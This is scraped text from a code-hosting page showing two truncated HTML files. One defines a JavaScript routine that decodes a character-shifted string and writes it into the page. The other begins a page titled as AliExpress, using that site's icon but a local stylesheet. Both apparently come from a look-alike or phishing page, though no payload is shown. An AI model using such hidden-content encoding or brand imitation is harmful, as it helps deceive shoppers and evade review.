This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html lang="en"> | |
<head> | |
<script language="javascript"> | |
function dF(s) { | |
var s1 = unescape(s.substr(0, s.length - 1)); | |
var t = ''; | |
for (i = 0; i < s1.length; i++) t += String.fromCharCode(s1.charCodeAt(i) - s.substr(s.length - 1, 1)); | |
document.write(unescape(t)); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<link rel="icon" href="https://ae01.alicdn.com/kf/S319fd8b965e247a28c70363f8c91d7c9i.ico"> | |
<link rel="stylesheet" href="./style.css"> | |
<title>Buy Product Online from China Wholesalers at Aliexpress.com</title> | |
<style> | |
/* Hide number input spinners for Chrome, Safari, Edge, and Opera */ |